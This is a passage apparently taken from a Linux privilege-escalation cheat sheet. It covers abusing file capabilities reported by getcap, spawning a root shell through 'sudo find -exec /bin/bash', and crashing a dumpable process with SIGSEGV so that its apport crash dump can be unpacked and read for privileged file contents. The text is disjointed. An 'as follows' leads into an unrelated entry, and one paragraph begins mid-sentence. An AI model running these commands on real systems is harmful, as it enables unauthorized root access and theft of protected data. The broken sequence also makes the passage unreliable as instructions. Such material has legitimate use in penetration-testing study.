`getcap` command. For example, if you execute it and it reports:

`/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip`

you are then able to abuse setuid, as follows:

`find`: you may be able to use it to execute commands as root: `sudo find . -exec /bin/bash \;`

`prctl(PR_SET_DUMPABLE, 1)`, or hinted at by a valgrind file. Press `ctrl + Z`, use `ps` to locate the executable's PID, and then send SIGSEGV to cause a segmentation fault (`kill -SIGSEGV [PID]`). Finally, execute `fg` to resume (and crash) the file, resulting in a crash file appearing (`/var/crash/_path_to_executable.uid.crash`).

Run `apport-unpack /tmp/_path_to_executable.uid.crash /tmp/mycrash`. Switch to the `/tmp/mycrash` directory and run `strings CoreDump`. Hopefully, the file content you are looking for will appear.